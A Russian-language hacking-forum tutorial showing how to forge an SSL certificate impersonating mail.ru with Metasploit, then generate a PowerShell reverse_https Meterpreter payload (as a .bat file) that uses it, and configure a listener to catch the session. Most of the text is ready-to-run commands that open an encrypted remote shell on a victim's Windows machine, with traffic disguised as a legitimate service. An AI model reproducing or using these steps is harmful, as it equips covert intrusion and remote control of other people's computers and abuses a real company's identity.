August 10, 2018

Шифруем соединение или SSL сертификат в работе

Всем привет. Сегодня я покажу как можно с помощью подручных средств в кали линукс, создать защищенный канал между полезной нагрузкой и листенером.

На нашем форуме уже освещалась данная тематика, где Vander делал подробный обзор про замечательный инструмент Meterpreter Paranoid Mode.

Статья - Создание SSL сертификата. Meterpreter. MPM

Сегодня я покажу альтернативный способ, создания ssl соединения, только с помощью метасплойта. Мы рассмотрим:

  • создания поддельного сертификата
  • создадим полезную нагрузку PowerShell где будем использовать сертификат который сгенерировали ранее.
  • Создания и настройка листенера для работы с нашей полезной нагрузкой.

Для создания поддельного сертификата мы будем использовать модуль из метасплойта

auxiliary/gather/impersonate_ssl

Я буду генерировать сертификат mail.ru

Запускаем метасплойт пишем:

use auxiliary/gather/impersonate_ssl

set RHOST www.mail.ru

run

По итогу как мы видим у нас создалось три файла.

Не плохой срок действия..)

Сейчас давайте создадим полезную нагрузку с нашим сгенерированным сертификатом.

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.108 LPORT=4444 PayloadUUIDTracking=true HandlerSSLCert=/root/www.mail.ru.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f psh-cmd -o 4444.bat

Далее создаём листенер который позволит нам принять данные с нашей полезной нагрузки для этого нам нужно добавить 2 две строчки, а именно:

set HandlerSSLCert /root/www.mail.ru.pem (путь где файл сертификата)

set StagerVerifySSLCert true

полностью это будет выглядеть следующим образом.

use multi/handler

set payload windows/meterpreter/reverse_https

set LHOST 192.168.0.108

set LPORT 4444

set HandlerSSLCert /root/www.mail.com.pem

set StagerVerifySSLCert true

exploit -j

Так как у меня белый IP через роутер ,листенер на картинке будет немного отличаться.

По итогу получаем заветную сессию с проверкой сертификата SSL

На этом всё, спасибо за внимание.